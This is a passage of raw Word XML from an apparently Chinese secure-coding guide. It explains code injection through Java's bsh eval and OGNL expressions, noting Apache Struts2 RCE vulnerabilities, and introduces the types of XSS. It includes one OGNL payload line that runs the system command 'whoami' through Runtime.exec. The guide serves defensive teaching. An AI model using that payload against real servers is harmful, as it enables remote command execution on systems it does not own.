          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:t>威胁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF3046" w:rsidRDefault="00DF3046" w:rsidP="00DF3046">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码注入是指用户将输入一段字符串作为程序运行并执行并将结果返回给用户。由于用户的输入不可行数据可以转换为程序服务器可以执行任意代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Remote code Execution)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF3046" w:rsidRPr="00AB0D5F" w:rsidRDefault="00DF3046" w:rsidP="00DF3046">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0D5F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Bsh</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0D5F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF3046" w:rsidRPr="00DF3046" w:rsidRDefault="00DF3046" w:rsidP="00335F35">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中提供了类似</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数功能的工具包</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bsh,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以将字符串动态解析为代码并执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF3046" w:rsidRPr="00DF3046" w:rsidRDefault="00DF3046" w:rsidP="00DF3046">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Interpreter in = new Interpreter();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF3046" w:rsidRPr="00DF3046" w:rsidRDefault="00DF3046" w:rsidP="00DF3046">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>in.eval(" System.out.println(\"hello\");");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF3046" w:rsidRPr="00DF3046" w:rsidRDefault="00DF3046" w:rsidP="00DF3046">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DF3046" w:rsidRPr="00DF3046" w:rsidRDefault="00DF3046" w:rsidP="004544B8">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>Ognl</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF3046" w:rsidRPr="00DF3046" w:rsidRDefault="00DF3046" w:rsidP="00A5637A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有能力创建或者改变可执行的代码，引入</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的框架可能也会引入相应代码注入安全问题。多个版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache S2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全漏洞使得系统变得非常脆弱。截止</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2017</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日，官方推荐的安全版本为</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.3.32</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.5.10.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其它版本均存在相应漏洞允许远程任意代码可执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF3046" w:rsidRPr="00DF3046" w:rsidRDefault="00DF3046" w:rsidP="00DF3046">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ognl</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式调用静态方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F6C56" w:rsidRPr="00C26930" w:rsidRDefault="00DF3046" w:rsidP="00DF3046">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3046">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F6C56" w:rsidRPr="00C26930" w:rsidRDefault="005F6C56" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F6C56" w:rsidRPr="00C26930" w:rsidRDefault="005F6C56" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F6C56" w:rsidRPr="00C26930" w:rsidRDefault="005F6C56" w:rsidP="005F6C56">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F6C56" w:rsidRPr="00C26930" w:rsidRDefault="005F6C56" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E47EF4" w:rsidRPr="00C26930" w:rsidRDefault="00E47EF4" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E47EF4" w:rsidRPr="00C26930" w:rsidRDefault="008C1A87" w:rsidP="00E47EF4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Cross-site Scripting (</w:t>
      </w:r>
      <w:r w:rsidR="00E47EF4" w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00E47EF4" w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>跨站脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47EF4" w:rsidRDefault="00C05155" w:rsidP="00A760E8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r w:rsidR="00A760E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>威胁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031182E" w:rsidRDefault="0031182E" w:rsidP="0031182E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cross Site Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的缩写，中文全称为跨站脚本攻击。层叠样式表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Cascading Style Sheets)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经简写为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，为了不与其在命名上冲突，因此简写为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般攻击形式为黑客往正常页面中插入精心构造的恶意脚本代码，用户一旦访问此被篡改后的页面，客户端浏览器将执行其中的恶意代码。攻击者可以盗取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息，甚至获取机器的权限控制整台机器成为其肉鸡。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A760E8" w:rsidRDefault="0031182E" w:rsidP="0031182E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑客可以通过自动化扫描工具或者人工测试方式找到存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>精心构造的恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施攻击，如盗取用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份信息、下载并安装恶意软件至用户的计算机、发动蠕虫攻击等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031182E" w:rsidRDefault="0031182E" w:rsidP="000D5259">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据其攻击形式不同，主要分为反射型</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Reflected)XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、存储型</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Stored)XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、基于</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Http</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求头</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(header)XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0031182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3D27" w:rsidRPr="000D3D27" w:rsidRDefault="000D3D27" w:rsidP="000D5259">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF3712">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>反射型</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3712">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3712">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也称为非持久性</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3712">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3712">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用户输入的不安全未经过滤的数据直接在浏览器器中输出，导致恶意脚本代码直接在浏览器中直接执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3D27" w:rsidRDefault="000D3D27" w:rsidP="000D5259">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="000D3D27">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>存储型</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3D27">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XSS(</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3D27">
        <w:t>Stored-XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3D27">
        <w:t>是指用户输入的不安全型数据未经任何安全检查处理直接存入后台的数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3D27">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3D27">
        <w:t>关系型、</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3D27">
        <w:t>NoSql</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3D27">
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3D27">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3D27">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A760E8" w:rsidRPr="00A760E8" w:rsidRDefault="000D5259" w:rsidP="000D5259">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="000D5259">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dom-Based XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5259">
        <w:t>与反射型、存储型</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5259">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5259">
        <w:t>不同的是，它是在浏览器解析</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5259">
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5259">
        <w:t>过程中发生的漏洞，恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5259">
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5259">
        <w:t>代码发生在客户端，并不会在服务器端返回响应页面源码直接显示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47EF4" w:rsidRDefault="00E47EF4" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D5259" w:rsidRDefault="000D5259" w:rsidP="000D5259">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="003F5D8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面展示“用户可控数据”，将直接导致跨站脚本威胁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5D8A" w:rsidRDefault="003F5D8A" w:rsidP="003F5D8A">
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ava</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
